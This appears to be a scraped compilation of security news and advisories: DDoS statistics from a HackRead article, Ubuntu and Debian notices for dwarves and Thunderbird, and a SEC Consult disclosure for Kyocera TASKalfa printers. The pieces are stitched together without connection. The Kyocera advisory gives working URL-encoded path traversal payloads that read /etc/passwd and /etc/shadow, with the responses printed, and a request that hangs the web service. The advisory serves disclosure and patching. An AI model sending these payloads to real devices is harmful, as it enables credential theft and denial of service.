Windows Authentication Denial of Service Vulnerability

CVE-2023-35329

Remote Procedure Call Runtime Denial of Service Vulnerability

CVE-2023-35319

CVE-2023-35318

A flaw was found in the QEMU built-in VNC server. When a client connects to the VNC server, QEMU checks whether the current number of connections crosses a certain threshold and if so, cleans up the previous connection. If the previous connection happens to be in the handshake phase and fails, QEMU cleans up the connection again, resulting in a NULL pointer dereference issue. This could allow a remote unauthenticated client to cause a denial of service.

'2216478?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2023-3354: Invalid Bug ID

Cross Site Request Forgery (CSRF) vulnerability in issabel-pbx v.4.0.0-6 allows a remote attacker to cause a denial of service via a crafted script to the deleteuser function.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-37596: CVE-2023-37596/README.md at main · sahiloj/CVE-2023-37596

By Waqas
The telecommunications sector also faced a significant onslaught in Q2 2023, becoming the second most targeted industry with an 83% YoY increase in DDoS attacks.
This is a post from HackRead.com Read the original post: DDoS Attacks Soar by 168% on Government Services, StormWall Warns

**According to StormWall’s Q2 2023 Report, the United States, India, and China remain the most heavily targeted countries, bearing the brunt of the escalating DDoS attacks.**

According to the Q2 2023 report released by global DDoS protection company StormWall, there has been a significant surge in Distributed Denial of Service **(DDoS) attacks**, with a staggering 68% increase compared to the previous year. The report unveils several key takeaways that shed light on the evolving landscape of cyber threats.

One of the most striking findings is the 136% increase in multi-vector attacks, indicating that cybercriminals are employing more sophisticated tactics to overwhelm their targets. Furthermore, StormWall observed a rise in the usage of Virtual Private Server **(VPS) botnets**, which adds to the complexity of mitigating these attacks.

Perhaps most concerning is the shift in targets towards essential services, including healthcare, financial institutions, and government agencies. StormWall’s report reveals that politically motivated attacks on the financial sector alone have experienced a staggering 110% year-over-year (YOY) increase, accounting for 26% of all attacks. This alarming trend highlights the potential consequences of cyber threats on the stability of critical financial infrastructure.

The telecommunications sector also faced a significant onslaught in Q2 2023, becoming the second most targeted industry with an 83% YoY increase in attacks. This demonstrates the growing vulnerability of communication networks and the potential disruptions to vital connectivity services.

This also confirms **Nokia’s latest finding**, which noted an increase in DDoS attacks against the telecom sector. It highlights a surge in malicious activity that was initially observed during the Russia-Ukraine conflict but has now spread to various regions globally.

Governments around the world should take immediate notice of the 168% surge in attacks on government services, which marks the highest increase across all sectors. StormWall’s report reveals that politically motivated threat actors orchestrated the majority of these incidents, indicating a scale of attacks not seen in recent months.

The transportation and healthcare sectors also experienced a worrisome increase of 137% and 126% YoY, respectively, showcasing the growing threats to crucial infrastructure.

The entertainment industry witnessed a notable spike as well, with a 72% YoY increase in attacks. Popular video streaming platforms and gaming servers were prime targets, leading to disruptions during the release of highly anticipated games such as **Diablo 4**.

While the ecommerce sector experienced a comparatively lower increase of 68%, StormWall’s report highlights that rival businesses aiming to disrupt competitors were the main driving force behind these attacks.

The logistics and education sectors accounted for 7% and 3% of the attacks, respectively. The manufacturing sector, although representing only 2% of attacks, saw an 18% YoY increase, indicating that threat actors are expanding their focus beyond the traditional target sectors.

Geographically, the United States, India, and China continue to bear the brunt of DDoS attacks. However, France has emerged as a notable addition to the list, experiencing a significant rise in attacks and becoming the fourth most targeted country.

DDoS attack by countries (StormWall)

StormWall’s Q1 2023 report, **released in April this year**, also listed India, China, and the United States as the top three countries to suffer from DDoS attacks.

StormWall’s founder and CEO, Ramil Khantimirov, expressed his concern over the escalating trend of DDoS attacks across industries. He emphasized the need for companies, especially those in essential services, to bolster their DDoS protection measures in preparation for what could be a challenging third quarter.

As cyber threats continue to evolve and grow in sophistication, organizations must prioritize robust cybersecurity strategies to safeguard their infrastructure, protect sensitive data, and ensure uninterrupted service delivery to customers and users.

1.  Significant increase in demand for stolen YouTube credentials
2.  DDoS attacks hitting BLM movement see widespread increase
3.  Vulnerable phones, IoT Devices: 400% increase in infection rate
4.  400% increase in cryptomining malware attacks against iPhones
5.  Israel Faces Fresh Wave of Cyberattacks on Critical Infrastructure

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

DDoS Attacks Soar by 168% on Government Services, StormWall Warns

Ubuntu Security Notice 6215-1 - It was discovered that dwarves incorrectly handled certain memory operations under certain circumstances. An attacker could possibly use this issue to cause dwarves to crash, resulting in a denial of service, or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6215-1July 11, 2023dwarves-dfsg vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS (Available with Ubuntu Pro)Summary:Several security issues were fixed in dwarves.Software Description:- dwarves-dfsg: set of advanced DWARF utilitiesDetails:It was discovered that dwarves incorrectly handled certain memoryoperations under certain circumstances. An attacker could possibly use thisissue to cause dwarves to crash, resulting in a denial of service, orpossibly execute arbitrary code. (CVE-2022-3534, CVE-2022-3606)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:  dwarves                         1.21-0ubuntu1~20.04.1Ubuntu 18.04 LTS (Available with Ubuntu Pro):  dwarves                         1.21-0ubuntu1~18.04.1+esm1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6215-1  CVE-2022-3534, CVE-2022-3606Package Information:  https://launchpad.net/ubuntu/+source/dwarves-dfsg/1.21-0ubuntu1~20.04.1

Ubuntu Security Notice USN-6215-1

Debian Linux Security Advisory 5451-1 - Multiple security issues were discovered in Thunderbird, which could result in denial of service or the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5451-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
July 09, 2023                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : thunderbird  
CVE ID         : CVE-2023-37201 CVE-2023-37202 CVE-2023-37207  
                 CVE-2023-37208 CVE-2023-37211  
Debian Bug     : 971790 1006432

Multiple security issues were discovered in Thunderbird, which could  
result in denial of service or the execution of arbitrary code.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 1:102.13.0-1~deb11u1.

For the stable distribution (bookworm), this problem has been fixed in  
version 1:102.13.0-1~deb12u1.

We recommend that you upgrade your thunderbird packages.

For the detailed security status of thunderbird please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/thunderbird

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmSq/IEACgkQEMKTtsN8  
TjbbzA//RGC3Tj6WRrccthY5Uxh30CLYzuGvJmlwzd4iH80/8cXZi4dbPu0bSFnP  
wA6qjtNxxeCFcc711699O9LqVGQUBzyK23hp012yHtPb4zjnWwkhZ7FqyZCvgx9d  
H06rtsuOAr2PBlS4bcW3NQy9fH1xMom/+blW6L4IejQ3jXJXmT6B/xZxo0aj39bE  
qNZXxtBWLdiIzVDjXbR7TMT9J+UkvTxyNTXKjf6d3u34LfEIfiHHE8vfZB+JCwwn  
17I8/nsecJglQHXpIu7dNfDNqLmLJPrceBl1R3XMHmA3uQLqQMypT5nsPdWpiMOW  
kOvgmE6jrUUcR7mgQsTcxqD6B5QEztEvOpaRrA7MB5geWewd8E4deksvGwv5Tr9R  
coBM2lzbLRrnbcki83qTjNX8D7B7Urs+uU3YIp/TNSwmaiLIXgwxu7CyzLUif6+7  
+n3GPSMski64qc6WJ0cPajQAmdX2pwtWmyYne5mcKpC3iujj/fQTpZ+Qf5Yuhs/K  
jAd+xqwOXpbEMrCwWBssy92Nj8vWkT2T4vIco1QRxKy3TSBkwubjigZSorKFIx6v  
39a4AeknI0HuH4E3oJ8E6+Um9miptZB4jswlRSRDay7H1AX6bVfs1Bi0L1pozNG6  
lfcugCF+TPFaLRBcBEK3dD4ch47x98rE9bOEZr2ITT2JuP+A1cE=  
=SqjJ  
-----END PGP SIGNATURE-----

Debian Security Advisory 5451-1

Ubuntu Security Notice 6214-1 - Multiple security issues were discovered in Thunderbird. If a user were tricked into opening a specially crafted website in a browsing context, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information, bypass security restrictions, cross-site tracing, or execute arbitrary code. P Umar Farooq discovered that Thunderbird did not properly provide warning when opening Diagcab files. If a user were tricked into opening a malicious Diagcab file, an attacker could execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6214-1July 11, 2023thunderbird vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.04- Ubuntu 22.10- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in Thunderbird.Software Description:- thunderbird: Mozilla Open Source mail and newsgroup clientDetails:Multiple security issues were discovered in Thunderbird. If a user weretricked into opening a specially crafted website in a browsing context, anattacker could potentially exploit these to cause a denial of service,obtain sensitive information, bypass security restrictions, cross-sitetracing, or execute arbitrary code. (CVE-2023-34414, CVE-2023-34416,CVE-2023-37201, CVE-2023-37202, CVE-2023-37207, CVE-2023-37211)P Umar Farooq discovered that Thunderbird did not properly provide warningwhen opening Diagcab files. If a user were tricked into opening amalicicous Diagcab file, an attacker could execute arbitrary code.(CVE-2023-37208)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.04:  thunderbird                     1:102.13.0+build1-0ubuntu0.23.04.1Ubuntu 22.10:  thunderbird                     1:102.13.0+build1-0ubuntu0.22.10.1Ubuntu 22.04 LTS:  thunderbird                     1:102.13.0+build1-0ubuntu0.22.04.1Ubuntu 20.04 LTS:  thunderbird                     1:102.13.0+build1-0ubuntu0.20.04.1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6214-1  CVE-2023-34414, CVE-2023-34416, CVE-2023-37201, CVE-2023-37202,  CVE-2023-37207, CVE-2023-37208, CVE-2023-37211Package Information:  https://launchpad.net/ubuntu/+source/thunderbird/1:102.13.0+build1-0ubuntu0.23.04.1  https://launchpad.net/ubuntu/+source/thunderbird/1:102.13.0+build1-0ubuntu0.22.10.1  https://launchpad.net/ubuntu/+source/thunderbird/1:102.13.0+build1-0ubuntu0.22.04.1  https://launchpad.net/ubuntu/+source/thunderbird/1:102.13.0+build1-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6214-1

Kyocera TASKalfa 4053ci versions 2VG_S000.002.561 and below suffers from path traversal, user enumeration, and denial of service vulnerabilities.

SEC Consult Vulnerability Lab Security Advisory < 20230705-0 >  
=======================================================================  
               title: Path traversal bypass & Denial of service  
             product: Kyocera TASKalfa 4053ci printer  
  vulnerable version: TASKalfa 4053ci Version <= 2VG_S000.002.561  
       fixed version: 2VG_S000.002.574  
         CVE numbers: CVE-2023-34259, CVE-2023-34260, CVE-2023-34261  
              impact: High  
            homepage: https://global.kyocera.com  
               found: 2022-12-13  
                  by: Stefan Michlits (Office Vienna)  
                      Gorazd Jank (Office Vienna)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Eviden business  
                      Europe | Asia

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Kyocera Document Solutions is leading the digital shift driving productivity  
and growth in the printing industry. We offer a range of exciting new options  
that draw on the combined resources of the Kyocera Group."

Source: https://www.kyoceradocumentsolutions.com/en/our-business/inkjet/

Business recommendation:  
------------------------  
SEC Consult recommends Kyocera customers to install the latest updates.

Furthermore, an in-depth security analysis performed by security professionals  
is highly advised, as the software may be affected from other security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Path Traversal - Bypass (CVE-2023-34259)  
A path traversal vulnerability was found by Hakan Eren ŞAN in 2020-06-06.  
The previous exploit can be found at: https://www.exploit-db.com/exploits/48561  
Kyocera has fixed the vulnerability. It was not possible to access arbitrary  
files using the public exploit. However, SEC Consult have found a bypass to  
exploit this vulnerability again and access arbitrary files. Due to the fact  
that the web service is running as the user root, it was possible to access all  
files (e.g. /etc/shadow) on the device.

2) Denial-of-Service - Web Interface (CVE-2023-34260)  
The denial-of-service vulnerability is related to the path traversal  
vulnerability. Instead of requesting a file, a directory will be requested.  
Once the request is sent to the web service running on TCP port 443, the web  
service will become unresponsive and must be restarted.

3) User Enumeration (CVE-2023-34261)  
The login function on the web service running on TCP port 443 is prone to a  
user enumeration vulnerability. The login function will return different  
responses, whether the username is valid or not.

Proof of concept:  
-----------------  
1) Path Traversal - Bypass (CVE-2023-34259)  
Previously, a security researcher has discovered an unauthenticated directory  
traversal vulnerability in the web service running on port 443. The following  
payload was used to access arbitrary files:

https://IP/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm

This vulnerability is fixed in the current version. It was not possible to  
access arbitrary files using the above payload. However, the vulnerability was  
not fixed correctly. SEC Consult identified a bypass to exploit this  
vulnerability again.

Once the ../ sequences will be URL encoded, it is possible to bypass the fix  
and access arbitrary files. The following payload can be used to access the  
file /etc/passwd:

https://IP/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm

The response containing the contents of the file /etc/passwd can be seen  
in the following paragraph.  
-------------------------------------------------------------------------------  
HTTP/1.1 200 OK  
Content-Length: 770  
Accept-Encoding: identity  
Server: KM-MFP-http/V0.0.1  
Content-Type: text/html  
X-Frame-Options: SAMEORIGIN

root:x:0:0:root:/root:/bin/sh  
daemon:x:1:1:daemon:/usr/sbin:/bin/sh  
bin:x:2:2:bin:/bin:/bin/sh  
sys:x:3:3:sys:/dev:/bin/sh  
sync:x:4:65534:sync:/bin:/bin/sync  
games:x:5:60:games:/usr/games:/bin/sh  
man:x:6:12:man:/var/cache/man:/bin/sh  
lp:x:7:7:lp:/var/spool/lpd:/bin/sh  
mail:x:8:8:mail:/var/mail:/bin/sh  
news:x:9:9:news:/var/spool/news:/bin/sh  
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh  
proxy:x:13:13:proxy:/bin:/bin/sh  
www-data:x:33:33:www-data:/var/www:/bin/sh  
backup:x:34:34:backup:/var/backups:/bin/sh  
list:x:38:38:Mailing List Manager:/var/list:/bin/sh  
irc:x:39:39:ircd:/var/run/ircd:/bin/sh  
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh  
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh  
sshd:x:100:1000:Linux User,,,:/var/run/sshd:/bin/false  
-------------------------------------------------------------------------------

Also, it was possible to access the file /etc/shadow. The following payload can  
be used:

https://IP/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/shadow%00index.htm

The output containing the content of the file /etc/shadow as it can be seen in  
the following paragraph.  
-------------------------------------------------------------------------------  
HTTP/1.1 200 OK  
Content-Length: 401  
Accept-Encoding: identity  
Server: KM-MFP-http/V0.0.1  
Content-Type: text/html  
X-Frame-Options: SAMEORIGIN

root:$1$tfE2pkl/$O8uDq*************bSH.:11029::::::  
daemon:*:11029::::::  
bin:*:11029::::::  
sys:*:11029::::::  
sync:*:11029::::::  
games:*:11029::::::  
man:*:11029::::::  
lp:*:11029::::::  
mail:*:11029::::::  
news:*:11029::::::  
uucp:*:11029::::::  
proxy:*:11029::::::  
www-data:*:11029::::::  
backup:*:11029::::::  
list:*:11029::::::  
irc:*:11029::::::  
gnats:*:11029::::::  
nobody:*:11029::::::  
sshd:x:11029::::::  
-------------------------------------------------------------------------------  
As the web service is running as the user root it was possible to access the  
/etc/shadow file or the file has set the wrong permissions.

Based on previous security assessments of Kyocera printers, it is likely that  
the service is running as the user root.

2) Denial-of-Service - Web Interface (CVE-2023-34260)  
To trigger the DoS attack it is sufficient to navigate to the URL:

https://IP/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%00index.htm

Once the request is sent to the web service, the web service will become  
unresponsive.

This attack is related to the path traversal vulnerability. The difference is  
that in this case a folder is requested instead of a file. Apparently, this  
leads to an error condition in the web server causing it to be unresponsive for  
all users. Other applications offering a web interface (e.g., on port 8083)  
seem to not be affected by the attack.

3) User Enumeration (CVE-2023-34261)  
The user enumeration is located in the login functionality of the web  
interface. Submitting an existing username will result in a different server  
response than submitting an incorrect username. This enables attackers to  
enumerate existing users by submitting potential usernames till a different  
response is gathered. In this case, it does not matter whether the transmitted  
password is correct or not. The gathered information could be used to better  
search for default passwords or custom passwords inside of public password  
leaks.  
In case, the username does not exist, the response will return  
"Login-Benutzername oder Passwort falsch.", on the other hand, if the  
username exists the response contains "Sie können sich nicht einloggen."

Vulnerable / tested versions:  
-----------------------------  
The following product has been tested:  
* Kyocera TASKalfa 4053ci

All versions older than "2VG_S000.002.561" are vulnerable according to the vendor.

Vendor contact timeline:  
------------------------  
2023-02-13: Asking for Kyocera KC-SIRT security contact through Nippon CSIRT  
             Association; quick response: https://www.nca.gr.jp/member/kc-sirt.html  
             (it seems only the Japanese website shows the email information)  
2023-02-14: Contacting Kyocera KC-SIRT through kc-sirt@gp.kyocera.jp  
2023-03-02: Contacting the vendor again, due to no response.  
2023-03-06: Vendor response, KDC-PSIRT is responsible, requesting security advisory.  
2023-03-13: Sending security advisory PGP-encrypted.  
2023-04-19: Vendor response, vulnerabilities confirmed.  
2023-05-19: Vendor response, the vulnerabilities were fixed. The patch will be  
             released on 2023-05-26.  
2023-05-22: Informing vendor that we will request CVE numbers, asking for  
             information about affected & fixed version numbers.  
2023-05-24: Vendor provides version information.  
2023-06-02: Sending CVE numbers to vendor, asking for link to patch download.  
2023-06-05: Vendor provides download information.  
2023-07-05: Public release of security advisory.

Solution:  
---------  
The vendor provided the following download information:

There are two ways to update the firmware of our products.  
* One is to contact the shop of purchase and update the firmware from a service person.  
* The other is to use the Firmware Upgrade tool. From the Kyocera Document Solutions  
   Global website in your country, you can download this tool and latest firmware.  
   Then you update the firmware yourself.  
   See: https://www.kyoceradocumentsolutions.com/download/ and choose "TASKalfa4053ci"

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF S. Michlits, G. Jank / @2023

Tag

#dos